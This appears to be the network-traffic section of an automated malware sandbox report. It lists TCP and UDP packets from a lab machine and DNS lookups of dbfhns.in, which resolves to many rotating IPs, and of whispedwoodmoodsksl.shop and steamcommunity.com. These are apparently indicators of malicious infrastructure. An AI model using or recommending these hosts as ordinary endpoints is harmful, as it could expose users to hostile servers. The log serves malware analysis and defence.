                                                                      May 26, 2024 10:29:45.581166029 CEST4434979265.109.242.59192.168.2.4
                                                                      May 26, 2024 10:29:45.581240892 CEST49792443192.168.2.465.109.242.59
                                                                      May 26, 2024 10:29:45.581265926 CEST4434979265.109.242.59192.168.2.4
                                                                      May 26, 2024 10:29:45.581310987 CEST49792443192.168.2.465.109.242.59
                                                                      May 26, 2024 10:29:45.581346989 CEST4434979265.109.242.59192.168.2.4
                                                                      May 26, 2024 10:29:45.581394911 CEST49792443192.168.2.465.109.242.59
                                                                      May 26, 2024 10:29:45.585994959 CEST49792443192.168.2.465.109.242.59
                                                                      May 26, 2024 10:29:45.586010933 CEST4434979265.109.242.59192.168.2.4
                                                                      May 26, 2024 10:29:46.141302109 CEST49793443192.168.2.465.109.242.59
                                                                      May 26, 2024 10:29:46.141340017 CEST4434979365.109.242.59192.168.2.4
                                                                      May 26, 2024 10:29:46.141412973 CEST49793443192.168.2.465.109.242.59
                                                                      May 26, 2024 10:29:46.141686916 CEST49793443192.168.2.465.109.242.59
                                                                      May 26, 2024 10:29:46.141700029 CEST4434979365.109.242.59192.168.2.4
                                                                      May 26, 2024 10:29:46.838882923 CEST4434979365.109.242.59192.168.2.4
                                                                      May 26, 2024 10:29:46.838959932 CEST49793443192.168.2.465.109.242.59
                                                                      May 26, 2024 10:29:46.840734959 CEST49793443192.168.2.465.109.242.59
                                                                      May 26, 2024 10:29:46.840760946 CEST4434979365.109.242.59192.168.2.4
                                                                      May 26, 2024 10:29:46.840887070 CEST49793443192.168.2.465.109.242.59
                                                                      May 26, 2024 10:29:46.840899944 CEST4434979365.109.242.59192.168.2.4
                                                                      May 26, 2024 10:29:47.627465963 CEST4434979365.109.242.59192.168.2.4
                                                                      May 26, 2024 10:29:47.627618074 CEST4434979365.109.242.59192.168.2.4
                                                                      May 26, 2024 10:29:47.627686024 CEST49793443192.168.2.465.109.242.59
                                                                      May 26, 2024 10:29:47.627851009 CEST49793443192.168.2.465.109.242.59
                                                                      May 26, 2024 10:29:47.627893925 CEST4434979365.109.242.59192.168.2.4
                                                                      May 26, 2024 10:30:09.562930107 CEST4979480192.168.2.4185.18.245.58
                                                                      May 26, 2024 10:30:09.568160057 CEST8049794185.18.245.58192.168.2.4
                                                                      May 26, 2024 10:30:09.568264008 CEST4979480192.168.2.4185.18.245.58
                                                                      May 26, 2024 10:30:09.568417072 CEST4979480192.168.2.4185.18.245.58
                                                                      May 26, 2024 10:30:09.568444014 CEST4979480192.168.2.4185.18.245.58
                                                                      May 26, 2024 10:30:09.620546103 CEST8049794185.18.245.58192.168.2.4
                                                                      May 26, 2024 10:30:09.667325974 CEST8049794185.18.245.58192.168.2.4
                                                                      May 26, 2024 10:30:10.527471066 CEST8049794185.18.245.58192.168.2.4
                                                                      May 26, 2024 10:30:10.527493000 CEST8049794185.18.245.58192.168.2.4
                                                                      May 26, 2024 10:30:10.527610064 CEST4979480192.168.2.4185.18.245.58
                                                                      May 26, 2024 10:30:10.532219887 CEST8049794185.18.245.58192.168.2.4
                                                                      May 26, 2024 10:30:10.532285929 CEST4979480192.168.2.4185.18.245.58
                                                                      May 26, 2024 10:30:10.758183002 CEST4979480192.168.2.4185.18.245.58
                                                                      May 26, 2024 10:30:10.763226986 CEST8049794185.18.245.58192.168.2.4
                                                                      May 26, 2024 10:30:16.088726044 CEST4979580192.168.2.4185.18.245.58
                                                                      May 26, 2024 10:30:16.093930960 CEST8049795185.18.245.58192.168.2.4
                                                                      May 26, 2024 10:30:16.094039917 CEST4979580192.168.2.4185.18.245.58
                                                                      May 26, 2024 10:30:16.094261885 CEST4979580192.168.2.4185.18.245.58
                                                                      May 26, 2024 10:30:16.094295979 CEST4979580192.168.2.4185.18.245.58
                                                                      May 26, 2024 10:30:16.147233963 CEST8049795185.18.245.58192.168.2.4
                                                                      May 26, 2024 10:30:16.199322939 CEST8049795185.18.245.58192.168.2.4
                                                                      May 26, 2024 10:30:17.015410900 CEST8049795185.18.245.58192.168.2.4
                                                                      May 26, 2024 10:30:17.020143032 CEST8049795185.18.245.58192.168.2.4
                                                                      May 26, 2024 10:30:17.020330906 CEST4979580192.168.2.4185.18.245.58
                                                                      May 26, 2024 10:30:17.020332098 CEST4979580192.168.2.4185.18.245.58
                                                                      May 26, 2024 10:30:17.077831984 CEST8049795185.18.245.58192.168.2.4
                                                                      May 26, 2024 10:30:20.789774895 CEST4979680192.168.2.4185.18.245.58
                                                                      May 26, 2024 10:30:20.794934034 CEST8049796185.18.245.58192.168.2.4
                                                                      May 26, 2024 10:30:20.795075893 CEST4979680192.168.2.4185.18.245.58
                                                                      May 26, 2024 10:30:20.795227051 CEST4979680192.168.2.4185.18.245.58
                                                                      May 26, 2024 10:30:20.795247078 CEST4979680192.168.2.4185.18.245.58
                                                                      May 26, 2024 10:30:20.848531961 CEST8049796185.18.245.58192.168.2.4
                                                                      May 26, 2024 10:30:20.899343014 CEST8049796185.18.245.58192.168.2.4
                                                                      May 26, 2024 10:30:21.744414091 CEST8049796185.18.245.58192.168.2.4
                                                                      May 26, 2024 10:30:21.749609947 CEST8049796185.18.245.58192.168.2.4
                                                                      May 26, 2024 10:30:21.749705076 CEST4979680192.168.2.4185.18.245.58
                                                                      May 26, 2024 10:30:21.749751091 CEST4979680192.168.2.4185.18.245.58
                                                                      May 26, 2024 10:30:21.800738096 CEST8049796185.18.245.58192.168.2.4
                                                                      May 26, 2024 10:30:26.653399944 CEST4979780192.168.2.4185.18.245.58
                                                                      May 26, 2024 10:30:26.663943052 CEST8049797185.18.245.58192.168.2.4
                                                                      May 26, 2024 10:30:26.664006948 CEST4979780192.168.2.4185.18.245.58
                                                                      May 26, 2024 10:30:26.664175034 CEST4979780192.168.2.4185.18.245.58
                                                                      May 26, 2024 10:30:26.664201975 CEST4979780192.168.2.4185.18.245.58
                                                                      May 26, 2024 10:30:26.674307108 CEST8049797185.18.245.58192.168.2.4
                                                                      May 26, 2024 10:30:26.723378897 CEST8049797185.18.245.58192.168.2.4
                                                                      May 26, 2024 10:30:27.631103992 CEST8049797185.18.245.58192.168.2.4
                                                                      May 26, 2024 10:30:27.635898113 CEST8049797185.18.245.58192.168.2.4
                                                                      May 26, 2024 10:30:27.635970116 CEST4979780192.168.2.4185.18.245.58
                                                                      May 26, 2024 10:30:27.834063053 CEST4979780192.168.2.4185.18.245.58
                                                                      May 26, 2024 10:30:27.845577955 CEST8049797185.18.245.58192.168.2.4
                                                                      May 26, 2024 10:30:32.827570915 CEST4979880192.168.2.4185.18.245.58
                                                                      May 26, 2024 10:30:32.832631111 CEST8049798185.18.245.58192.168.2.4
                                                                      May 26, 2024 10:30:32.832706928 CEST4979880192.168.2.4185.18.245.58
                                                                      May 26, 2024 10:30:32.832952976 CEST4979880192.168.2.4185.18.245.58
                                                                      May 26, 2024 10:30:32.832953930 CEST4979880192.168.2.4185.18.245.58
                                                                      May 26, 2024 10:30:32.885297060 CEST8049798185.18.245.58192.168.2.4
                                                                      May 26, 2024 10:30:32.885325909 CEST8049798185.18.245.58192.168.2.4
                                                                      May 26, 2024 10:30:33.771975040 CEST8049798185.18.245.58192.168.2.4
                                                                      May 26, 2024 10:30:33.776817083 CEST8049798185.18.245.58192.168.2.4
                                                                      May 26, 2024 10:30:33.776901007 CEST4979880192.168.2.4185.18.245.58
                                                                      May 26, 2024 10:30:33.776958942 CEST4979880192.168.2.4185.18.245.58
                                                                      May 26, 2024 10:30:33.828512907 CEST8049798185.18.245.58192.168.2.4
                                                                      May 26, 2024 10:30:38.034699917 CEST4979980192.168.2.4185.18.245.58
                                                                      May 26, 2024 10:30:38.039819002 CEST8049799185.18.245.58192.168.2.4
                                                                      May 26, 2024 10:30:38.039899111 CEST4979980192.168.2.4185.18.245.58
                                                                      May 26, 2024 10:30:38.040045977 CEST4979980192.168.2.4185.18.245.58
                                                                      May 26, 2024 10:30:38.040066004 CEST4979980192.168.2.4185.18.245.58
                                                                      May 26, 2024 10:30:38.094229937 CEST8049799185.18.245.58192.168.2.4
                                                                      May 26, 2024 10:30:38.143368959 CEST8049799185.18.245.58192.168.2.4
                                                                      May 26, 2024 10:30:38.973047018 CEST8049799185.18.245.58192.168.2.4
                                                                      May 26, 2024 10:30:38.980190992 CEST8049799185.18.245.58192.168.2.4
                                                                      May 26, 2024 10:30:38.980269909 CEST4979980192.168.2.4185.18.245.58
                                                                      May 26, 2024 10:30:38.980314970 CEST4979980192.168.2.4185.18.245.58
                                                                      May 26, 2024 10:30:39.036474943 CEST8049799185.18.245.58192.168.2.4
                                                                      May 26, 2024 10:30:42.954227924 CEST4980080192.168.2.4185.18.245.58
                                                                      May 26, 2024 10:30:42.959763050 CEST8049800185.18.245.58192.168.2.4
                                                                      May 26, 2024 10:30:42.959866047 CEST4980080192.168.2.4185.18.245.58
                                                                      May 26, 2024 10:30:42.960078001 CEST4980080192.168.2.4185.18.245.58
                                                                      May 26, 2024 10:30:42.960122108 CEST4980080192.168.2.4185.18.245.58
                                                                      May 26, 2024 10:30:43.012643099 CEST8049800185.18.245.58192.168.2.4
                                                                      May 26, 2024 10:30:43.064084053 CEST8049800185.18.245.58192.168.2.4
                                                                      May 26, 2024 10:30:43.896199942 CEST8049800185.18.245.58192.168.2.4
                                                                      May 26, 2024 10:30:43.902046919 CEST8049800185.18.245.58192.168.2.4
                                                                      May 26, 2024 10:30:43.902097940 CEST4980080192.168.2.4185.18.245.58
                                                                      May 26, 2024 10:30:43.902182102 CEST4980080192.168.2.4185.18.245.58
                                                                      May 26, 2024 10:30:43.956507921 CEST8049800185.18.245.58192.168.2.4
                                                                      May 26, 2024 10:30:49.934374094 CEST4980180192.168.2.4185.18.245.58
                                                                      May 26, 2024 10:30:49.939690113 CEST8049801185.18.245.58192.168.2.4
                                                                      May 26, 2024 10:30:49.939815998 CEST4980180192.168.2.4185.18.245.58
                                                                      May 26, 2024 10:30:49.939903975 CEST4980180192.168.2.4185.18.245.58
                                                                      May 26, 2024 10:30:49.939929008 CEST4980180192.168.2.4185.18.245.58
                                                                      May 26, 2024 10:30:49.992763042 CEST8049801185.18.245.58192.168.2.4
                                                                      May 26, 2024 10:30:50.043514013 CEST8049801185.18.245.58192.168.2.4
                                                                      May 26, 2024 10:30:50.878731012 CEST8049801185.18.245.58192.168.2.4
                                                                      May 26, 2024 10:30:50.883440018 CEST8049801185.18.245.58192.168.2.4
                                                                      May 26, 2024 10:30:50.883507967 CEST4980180192.168.2.4185.18.245.58
                                                                      May 26, 2024 10:30:50.883554935 CEST4980180192.168.2.4185.18.245.58
                                                                      May 26, 2024 10:30:50.940187931 CEST8049801185.18.245.58192.168.2.4
                                                                      May 26, 2024 10:30:57.512474060 CEST4980280192.168.2.431.176.197.47
                                                                      May 26, 2024 10:30:57.563460112 CEST804980231.176.197.47192.168.2.4
                                                                      May 26, 2024 10:30:57.563560963 CEST4980280192.168.2.431.176.197.47
                                                                      May 26, 2024 10:30:57.563988924 CEST4980280192.168.2.431.176.197.47
                                                                      May 26, 2024 10:30:57.563998938 CEST4980280192.168.2.431.176.197.47
                                                                      May 26, 2024 10:30:57.569348097 CEST804980231.176.197.47192.168.2.4
                                                                      May 26, 2024 10:30:57.618407011 CEST804980231.176.197.47192.168.2.4
                                                                      May 26, 2024 10:30:58.361211061 CEST804980231.176.197.47192.168.2.4
                                                                      May 26, 2024 10:30:58.361268044 CEST804980231.176.197.47192.168.2.4
                                                                      May 26, 2024 10:30:58.361340046 CEST4980280192.168.2.431.176.197.47
                                                                      May 26, 2024 10:30:58.361519098 CEST4980280192.168.2.431.176.197.47
                                                                      May 26, 2024 10:30:58.387559891 CEST804980231.176.197.47192.168.2.4
                                                                      May 26, 2024 10:31:04.065429926 CEST4980380192.168.2.431.176.197.47
                                                                      May 26, 2024 10:31:04.070698023 CEST804980331.176.197.47192.168.2.4
                                                                      May 26, 2024 10:31:04.070802927 CEST4980380192.168.2.431.176.197.47
                                                                      May 26, 2024 10:31:04.070961952 CEST4980380192.168.2.431.176.197.47
                                                                      May 26, 2024 10:31:04.070996046 CEST4980380192.168.2.431.176.197.47
                                                                      May 26, 2024 10:31:04.128709078 CEST804980331.176.197.47192.168.2.4
                                                                      May 26, 2024 10:31:04.175508976 CEST804980331.176.197.47192.168.2.4
                                                                      May 26, 2024 10:31:04.894013882 CEST804980331.176.197.47192.168.2.4
                                                                      May 26, 2024 10:31:04.898878098 CEST804980331.176.197.47192.168.2.4
                                                                      May 26, 2024 10:31:04.898947001 CEST4980380192.168.2.431.176.197.47
                                                                      May 26, 2024 10:31:04.899017096 CEST4980380192.168.2.431.176.197.47
                                                                      May 26, 2024 10:31:04.952327013 CEST804980331.176.197.47192.168.2.4
                                                                      May 26, 2024 10:31:09.236984015 CEST4980480192.168.2.431.176.197.47
                                                                      May 26, 2024 10:31:09.241966963 CEST804980431.176.197.47192.168.2.4
                                                                      May 26, 2024 10:31:09.242053032 CEST4980480192.168.2.431.176.197.47
                                                                      May 26, 2024 10:31:09.242156029 CEST4980480192.168.2.431.176.197.47
                                                                      May 26, 2024 10:31:09.242172956 CEST4980480192.168.2.431.176.197.47
                                                                      May 26, 2024 10:31:09.283600092 CEST804980431.176.197.47192.168.2.4
                                                                      May 26, 2024 10:31:09.290853024 CEST804980431.176.197.47192.168.2.4
                                                                      May 26, 2024 10:31:10.067325115 CEST804980431.176.197.47192.168.2.4
                                                                      May 26, 2024 10:31:10.067342997 CEST804980431.176.197.47192.168.2.4
                                                                      May 26, 2024 10:31:10.067354918 CEST804980431.176.197.47192.168.2.4
                                                                      May 26, 2024 10:31:10.067401886 CEST4980480192.168.2.431.176.197.47
                                                                      May 26, 2024 10:31:10.067431927 CEST4980480192.168.2.431.176.197.47
                                                                      May 26, 2024 10:31:10.067676067 CEST4980480192.168.2.431.176.197.47
                                                                      May 26, 2024 10:31:10.119386911 CEST804980431.176.197.47192.168.2.4
                                                                      May 26, 2024 10:31:14.137216091 CEST4980580192.168.2.431.176.197.47
                                                                      May 26, 2024 10:31:14.160953045 CEST804980531.176.197.47192.168.2.4
                                                                      May 26, 2024 10:31:14.161055088 CEST4980580192.168.2.431.176.197.47
                                                                      May 26, 2024 10:31:14.161207914 CEST4980580192.168.2.431.176.197.47
                                                                      May 26, 2024 10:31:14.161231995 CEST4980580192.168.2.431.176.197.47
                                                                      May 26, 2024 10:31:14.168622971 CEST804980531.176.197.47192.168.2.4
                                                                      May 26, 2024 10:31:14.168637991 CEST804980531.176.197.47192.168.2.4
                                                                      May 26, 2024 10:31:14.957427979 CEST804980531.176.197.47192.168.2.4
                                                                      May 26, 2024 10:31:14.962198019 CEST804980531.176.197.47192.168.2.4
                                                                      May 26, 2024 10:31:14.962254047 CEST4980580192.168.2.431.176.197.47
                                                                      May 26, 2024 10:31:14.962311029 CEST4980580192.168.2.431.176.197.47
                                                                      May 26, 2024 10:31:15.016412973 CEST804980531.176.197.47192.168.2.4
                                                                      May 26, 2024 10:31:20.908504009 CEST4980680192.168.2.431.176.197.47
                                                                      May 26, 2024 10:31:20.922080040 CEST804980631.176.197.47192.168.2.4
                                                                      May 26, 2024 10:31:20.922226906 CEST4980680192.168.2.431.176.197.47
                                                                      May 26, 2024 10:31:20.922297001 CEST4980680192.168.2.431.176.197.47
                                                                      May 26, 2024 10:31:20.922297001 CEST4980680192.168.2.431.176.197.47
                                                                      May 26, 2024 10:31:20.936760902 CEST804980631.176.197.47192.168.2.4
                                                                      May 26, 2024 10:31:20.936791897 CEST804980631.176.197.47192.168.2.4
                                                                      May 26, 2024 10:31:21.738017082 CEST804980631.176.197.47192.168.2.4
                                                                      May 26, 2024 10:31:21.742827892 CEST804980631.176.197.47192.168.2.4
                                                                      May 26, 2024 10:31:21.743081093 CEST4980680192.168.2.431.176.197.47
                                                                      May 26, 2024 10:31:21.743082047 CEST4980680192.168.2.431.176.197.47
                                                                      May 26, 2024 10:31:21.796302080 CEST804980631.176.197.47192.168.2.4
                                                                      May 26, 2024 10:31:25.828056097 CEST4980780192.168.2.431.176.197.47
                                                                      May 26, 2024 10:31:25.837709904 CEST804980731.176.197.47192.168.2.4
                                                                      May 26, 2024 10:31:25.837817907 CEST4980780192.168.2.431.176.197.47
                                                                      May 26, 2024 10:31:25.838072062 CEST4980780192.168.2.431.176.197.47
                                                                      May 26, 2024 10:31:25.838072062 CEST4980780192.168.2.431.176.197.47
                                                                      May 26, 2024 10:31:25.849769115 CEST804980731.176.197.47192.168.2.4
                                                                      May 26, 2024 10:31:25.849850893 CEST804980731.176.197.47192.168.2.4
                                                                      May 26, 2024 10:31:26.629755020 CEST804980731.176.197.47192.168.2.4
                                                                      May 26, 2024 10:31:26.634565115 CEST804980731.176.197.47192.168.2.4
                                                                      May 26, 2024 10:31:26.634635925 CEST4980780192.168.2.431.176.197.47
                                                                      May 26, 2024 10:31:26.634762049 CEST4980780192.168.2.431.176.197.47
                                                                      May 26, 2024 10:31:26.662709951 CEST804980731.176.197.47192.168.2.4
                                                                      May 26, 2024 10:31:30.858613968 CEST4980880192.168.2.431.176.197.47
                                                                      May 26, 2024 10:31:30.908090115 CEST804980831.176.197.47192.168.2.4
                                                                      May 26, 2024 10:31:30.908201933 CEST4980880192.168.2.431.176.197.47
                                                                      May 26, 2024 10:31:30.908327103 CEST4980880192.168.2.431.176.197.47
                                                                      May 26, 2024 10:31:30.908363104 CEST4980880192.168.2.431.176.197.47
                                                                      May 26, 2024 10:31:30.917903900 CEST804980831.176.197.47192.168.2.4
                                                                      May 26, 2024 10:31:30.963354111 CEST804980831.176.197.47192.168.2.4
                                                                      May 26, 2024 10:31:31.731391907 CEST804980831.176.197.47192.168.2.4
                                                                      May 26, 2024 10:31:31.731405020 CEST804980831.176.197.47192.168.2.4
                                                                      May 26, 2024 10:31:31.731498957 CEST4980880192.168.2.431.176.197.47
                                                                      May 26, 2024 10:31:31.731674910 CEST4980880192.168.2.431.176.197.47
                                                                      May 26, 2024 10:31:31.740982056 CEST804980831.176.197.47192.168.2.4
                                                                      May 26, 2024 10:31:37.244609118 CEST4980980192.168.2.431.176.197.47
                                                                      May 26, 2024 10:31:37.250000000 CEST804980931.176.197.47192.168.2.4
                                                                      May 26, 2024 10:31:37.250148058 CEST4980980192.168.2.431.176.197.47
                                                                      May 26, 2024 10:31:37.250287056 CEST4980980192.168.2.431.176.197.47
                                                                      May 26, 2024 10:31:37.250320911 CEST4980980192.168.2.431.176.197.47
                                                                      May 26, 2024 10:31:37.300910950 CEST804980931.176.197.47192.168.2.4
                                                                      May 26, 2024 10:31:37.351592064 CEST804980931.176.197.47192.168.2.4
                                                                      May 26, 2024 10:31:38.073501110 CEST804980931.176.197.47192.168.2.4
                                                                      May 26, 2024 10:31:38.078207016 CEST804980931.176.197.47192.168.2.4
                                                                      May 26, 2024 10:31:38.078298092 CEST4980980192.168.2.431.176.197.47
                                                                      May 26, 2024 10:31:38.078377008 CEST4980980192.168.2.431.176.197.47
                                                                      May 26, 2024 10:31:38.128392935 CEST804980931.176.197.47192.168.2.4
                                                                      May 26, 2024 10:31:42.024106979 CEST4981080192.168.2.431.176.197.47
                                                                      May 26, 2024 10:31:42.029328108 CEST804981031.176.197.47192.168.2.4
                                                                      May 26, 2024 10:31:42.029429913 CEST4981080192.168.2.431.176.197.47
                                                                      May 26, 2024 10:31:42.029567957 CEST4981080192.168.2.431.176.197.47
                                                                      May 26, 2024 10:31:42.029599905 CEST4981080192.168.2.431.176.197.47
                                                                      May 26, 2024 10:31:42.080518007 CEST804981031.176.197.47192.168.2.4
                                                                      May 26, 2024 10:31:42.131305933 CEST804981031.176.197.47192.168.2.4
                                                                      May 26, 2024 10:31:42.835387945 CEST804981031.176.197.47192.168.2.4
                                                                      May 26, 2024 10:31:42.840717077 CEST804981031.176.197.47192.168.2.4
                                                                      May 26, 2024 10:31:42.840846062 CEST4981080192.168.2.431.176.197.47
                                                                      May 26, 2024 10:31:42.840887070 CEST4981080192.168.2.431.176.197.47
                                                                      May 26, 2024 10:31:42.896867037 CEST804981031.176.197.47192.168.2.4
                                                                      May 26, 2024 10:31:46.911254883 CEST4981180192.168.2.431.176.197.47
                                                                      May 26, 2024 10:31:46.916402102 CEST804981131.176.197.47192.168.2.4
                                                                      May 26, 2024 10:31:46.916517019 CEST4981180192.168.2.431.176.197.47
                                                                      May 26, 2024 10:31:46.916707993 CEST4981180192.168.2.431.176.197.47
                                                                      May 26, 2024 10:31:46.916753054 CEST4981180192.168.2.431.176.197.47
                                                                      May 26, 2024 10:31:46.968481064 CEST804981131.176.197.47192.168.2.4
                                                                      May 26, 2024 10:31:47.020040035 CEST804981131.176.197.47192.168.2.4
                                                                      May 26, 2024 10:31:47.836388111 CEST804981131.176.197.47192.168.2.4
                                                                      May 26, 2024 10:31:47.836462021 CEST804981131.176.197.47192.168.2.4
                                                                      May 26, 2024 10:31:47.836534023 CEST4981180192.168.2.431.176.197.47
                                                                      May 26, 2024 10:31:47.836625099 CEST4981180192.168.2.431.176.197.47
                                                                      May 26, 2024 10:31:47.846354961 CEST804981131.176.197.47192.168.2.4
                                                                      May 26, 2024 10:31:52.139843941 CEST4981280192.168.2.431.176.197.47
                                                                      May 26, 2024 10:31:52.144993067 CEST804981231.176.197.47192.168.2.4
                                                                      May 26, 2024 10:31:52.145064116 CEST4981280192.168.2.431.176.197.47
                                                                      May 26, 2024 10:31:52.145184994 CEST4981280192.168.2.431.176.197.47
                                                                      May 26, 2024 10:31:52.145207882 CEST4981280192.168.2.431.176.197.47
                                                                      May 26, 2024 10:31:52.196585894 CEST804981231.176.197.47192.168.2.4
                                                                      May 26, 2024 10:31:52.247817993 CEST804981231.176.197.47192.168.2.4
                                                                      May 26, 2024 10:31:52.961499929 CEST804981231.176.197.47192.168.2.4
                                                                      May 26, 2024 10:31:52.966175079 CEST804981231.176.197.47192.168.2.4
                                                                      May 26, 2024 10:31:52.966248035 CEST4981280192.168.2.431.176.197.47
                                                                      May 26, 2024 10:31:53.462282896 CEST4981280192.168.2.431.176.197.47
                                                                      May 26, 2024 10:31:53.467406034 CEST804981231.176.197.47192.168.2.4
                                                                      May 26, 2024 10:31:58.299091101 CEST4981380192.168.2.431.176.197.47
                                                                      May 26, 2024 10:31:58.304241896 CEST804981331.176.197.47192.168.2.4
                                                                      May 26, 2024 10:31:58.304322958 CEST4981380192.168.2.431.176.197.47
                                                                      May 26, 2024 10:31:58.304457903 CEST4981380192.168.2.431.176.197.47
                                                                      May 26, 2024 10:31:58.304493904 CEST4981380192.168.2.431.176.197.47
                                                                      May 26, 2024 10:31:58.360450029 CEST804981331.176.197.47192.168.2.4
                                                                      May 26, 2024 10:31:58.411330938 CEST804981331.176.197.47192.168.2.4
                                                                      May 26, 2024 10:31:59.111386061 CEST804981331.176.197.47192.168.2.4
                                                                      May 26, 2024 10:31:59.116142988 CEST804981331.176.197.47192.168.2.4
                                                                      May 26, 2024 10:31:59.116202116 CEST4981380192.168.2.431.176.197.47
                                                                      May 26, 2024 10:31:59.116233110 CEST4981380192.168.2.431.176.197.47
                                                                      May 26, 2024 10:31:59.168406010 CEST804981331.176.197.47192.168.2.4

                                                                      UDP Packets

                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                      May 26, 2024 10:28:21.164741993 CEST6389453192.168.2.41.1.1.1
                                                                      May 26, 2024 10:28:21.309257030 CEST53638941.1.1.1192.168.2.4
                                                                      May 26, 2024 10:28:30.181811094 CEST5541153192.168.2.41.1.1.1
                                                                      May 26, 2024 10:28:30.195684910 CEST53554111.1.1.1192.168.2.4
                                                                      May 26, 2024 10:29:00.701169014 CEST6128453192.168.2.41.1.1.1
                                                                      May 26, 2024 10:29:00.715989113 CEST53612841.1.1.1192.168.2.4
                                                                      May 26, 2024 10:30:55.100431919 CEST4950853192.168.2.41.1.1.1
                                                                      May 26, 2024 10:30:56.114547968 CEST4950853192.168.2.41.1.1.1
                                                                      May 26, 2024 10:30:57.114578962 CEST4950853192.168.2.41.1.1.1
                                                                      May 26, 2024 10:30:57.511554003 CEST53495081.1.1.1192.168.2.4
                                                                      May 26, 2024 10:30:57.516274929 CEST53495081.1.1.1192.168.2.4
                                                                      May 26, 2024 10:30:57.516305923 CEST53495081.1.1.1192.168.2.4

                                                                      DNS Queries

                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                      May 26, 2024 10:28:21.164741993 CEST192.168.2.41.1.1.10xf8fcStandard query (0)dbfhns.inA (IP address)IN (0x0001)false
                                                                      May 26, 2024 10:28:30.181811094 CEST192.168.2.41.1.1.10xaee9Standard query (0)whispedwoodmoodsksl.shopA (IP address)IN (0x0001)false
                                                                      May 26, 2024 10:29:00.701169014 CEST192.168.2.41.1.1.10x98e0Standard query (0)steamcommunity.comA (IP address)IN (0x0001)false
                                                                      May 26, 2024 10:30:55.100431919 CEST192.168.2.41.1.1.10xff21Standard query (0)dbfhns.inA (IP address)IN (0x0001)false
                                                                      May 26, 2024 10:30:56.114547968 CEST192.168.2.41.1.1.10xff21Standard query (0)dbfhns.inA (IP address)IN (0x0001)false
                                                                      May 26, 2024 10:30:57.114578962 CEST192.168.2.41.1.1.10xff21Standard query (0)dbfhns.inA (IP address)IN (0x0001)false

                                                                      DNS Answers

                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                      May 26, 2024 10:28:21.309257030 CEST1.1.1.1192.168.2.40xf8fcNo error (0)dbfhns.in185.18.245.58A (IP address)IN (0x0001)false
                                                                      May 26, 2024 10:28:21.309257030 CEST1.1.1.1192.168.2.40xf8fcNo error (0)dbfhns.in88.225.215.104A (IP address)IN (0x0001)false
                                                                      May 26, 2024 10:28:21.309257030 CEST1.1.1.1192.168.2.40xf8fcNo error (0)dbfhns.in211.181.24.133A (IP address)IN (0x0001)false
                                                                      May 26, 2024 10:28:21.309257030 CEST1.1.1.1192.168.2.40xf8fcNo error (0)dbfhns.in95.86.30.3A (IP address)IN (0x0001)false
                                                                      May 26, 2024 10:28:21.309257030 CEST1.1.1.1192.168.2.40xf8fcNo error (0)dbfhns.in84.252.15.104A (IP address)IN (0x0001)false
                                                                      May 26, 2024 10:28:21.309257030 CEST1.1.1.1192.168.2.40xf8fcNo error (0)dbfhns.in116.58.10.59A (IP address)IN (0x0001)false
                                                                      May 26, 2024 10:28:21.309257030 CEST1.1.1.1192.168.2.40xf8fcNo error (0)dbfhns.in211.181.24.132A (IP address)IN (0x0001)false
                                                                      May 26, 2024 10:28:21.309257030 CEST1.1.1.1192.168.2.40xf8fcNo error (0)dbfhns.in190.28.110.209A (IP address)IN (0x0001)false
                                                                      May 26, 2024 10:28:21.309257030 CEST1.1.1.1192.168.2.40xf8fcNo error (0)dbfhns.in187.134.55.166A (IP address)IN (0x0001)false
                                                                      May 26, 2024 10:28:21.309257030 CEST1.1.1.1192.168.2.40xf8fcNo error (0)dbfhns.in186.101.193.110A (IP address)IN (0x0001)false
                                                                      May 26, 2024 10:28:30.195684910 CEST1.1.1.1192.168.2.40xaee9No error (0)whispedwoodmoodsksl.shop188.114.96.3A (IP address)IN (0x0001)false
                                                                      May 26, 2024 10:28:30.195684910 CEST1.1.1.1192.168.2.40xaee9No error (0)whispedwoodmoodsksl.shop188.114.97.3A (IP address)IN (0x0001)false
                                                                      May 26, 2024 10:29:00.715989113 CEST1.1.1.1192.168.2.40x98e0No error (0)steamcommunity.com23.199.218.33A (IP address)IN (0x0001)false
                                                                      May 26, 2024 10:30:57.511554003 CEST1.1.1.1192.168.2.40xff21No error (0)dbfhns.in31.176.197.47A (IP address)IN (0x0001)false
                                                                      May 26, 2024 10:30:57.511554003 CEST1.1.1.1192.168.2.40xff21No error (0)dbfhns.in92.36.226.66A (IP address)IN (0x0001)false
                                                                      May 26, 2024 10:30:57.511554003 CEST1.1.1.1192.168.2.40xff21No error (0)dbfhns.in220.82.134.210A (IP address)IN (0x0001)false
                                                                      May 26, 2024 10:30:57.511554003 CEST1.1.1.1192.168.2.40xff21No error (0)dbfhns.in181.47.131.246A (IP address)IN (0x0001)false
                                                                      May 26, 2024 10:30:57.511554003 CEST1.1.1.1192.168.2.40xff21No error (0)dbfhns.in189.61.54.32A (IP address)IN (0x0001)false
                                                                      May 26, 2024 10:30:57.511554003 CEST1.1.1.1192.168.2.40xff21No error (0)dbfhns.in109.175.29.39A (IP address)IN (0x0001)false
                                                                      May 26, 2024 10:30:57.511554003 CEST1.1.1.1192.168.2.40xff21No error (0)dbfhns.in190.187.52.42A (IP address)IN (0x0001)false
                                                                      May 26, 2024 10:30:57.511554003 CEST1.1.1.1192.168.2.40xff21No error (0)dbfhns.in211.119.84.111A (IP address)IN (0x0001)false
                                                                      May 26, 2024 10:30:57.511554003 CEST1.1.1.1192.168.2.40xff21No error (0)dbfhns.in2.185.214.11A (IP address)IN (0x0001)false
                                                                      May 26, 2024 10:30:57.511554003 CEST1.1.1.1192.168.2.40xff21No error (0)dbfhns.in201.191.99.134A (IP address)IN (0x0001)false
                                                                      May 26, 2024 10:30:57.516274929 CEST1.1.1.1192.168.2.40xff21No error (0)dbfhns.in31.176.197.47A (IP address)IN (0x0001)false
                                                                      May 26, 2024 10:30:57.516274929 CEST1.1.1.1192.168.2.40xff21No error (0)dbfhns.in92.36.226.66A (IP address)IN (0x0001)false
                                                                      May 26, 2024 10:30:57.516274929 CEST1.1.1.1192.168.2.40xff21No error (0)dbfhns.in220.82.134.210A (IP address)IN (0x0001)false
                                                                      May 26, 2024 10:30:57.516274929 CEST1.1.1.1192.168.2.40xff21No error (0)dbfhns.in181.47.131.246A (IP address)IN (0x0001)false
                                                                      May 26, 2024 10:30:57.516274929 CEST1.1.1.1192.168.2.40xff21No error (0)dbfhns.in189.61.54.32A (IP address)IN (0x0001)false
